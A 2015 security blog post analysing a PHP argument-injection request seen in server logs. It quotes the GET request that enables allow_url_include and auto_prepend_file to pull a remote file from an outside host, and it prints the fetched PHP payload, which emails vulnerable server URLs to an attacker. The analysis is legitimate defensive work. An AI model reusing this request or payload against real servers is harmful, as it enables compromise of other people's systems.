Monday, November 30, 2015

php injection sending email

I saw this php injection attempt that I thought was interesting.

GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://netsunucum.com/status/-/d.txt


The attempt is looking for mis-configured insecure PHP web servers. Looking for ones that will give the ability to enable url includes and then automatically prepend the file. When I downloaded the malicious payload file url ( hxxp://netsunucum.com/status/-/d.txt [see at urlquery] ) I found this which was also interesting.

SP4M3R
<?php
$from = "INBOX <h4x0r@r0x.com">";
$sentTo = "vaidominio2@gmail.com";
$subject = "VULN r0x";
$msg_body = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$header_info = "From: ".$from;
mail($sentTo, $subject, $msg_body, $header_info);
?>


If the php web server is vulnerable, then this php file above will get auto-included and pre-pended to the current php page, thus getting executed. When it's executed it actually uses PHP mail to send an email to the attacker's gmail account if the server it hit was vulnerable. The attacker at vaidominio2@gmail.com will get an email indicating that the server name in the body is vulnerable to the php injection.



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. php injection walk-thru
  3. vbulletin rce walk-thru


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

2 comments:

  1. yep... I got flooded. 1000s of webforms sent to me.

    https://yadi.sk/i/cGgTsWn3mHQNQ

    ReplyDelete
  2. yep... I got flooded. 1000s of webforms sent to me.

    https://yadi.sk/i/cGgTsWn3mHQNQ

    ReplyDelete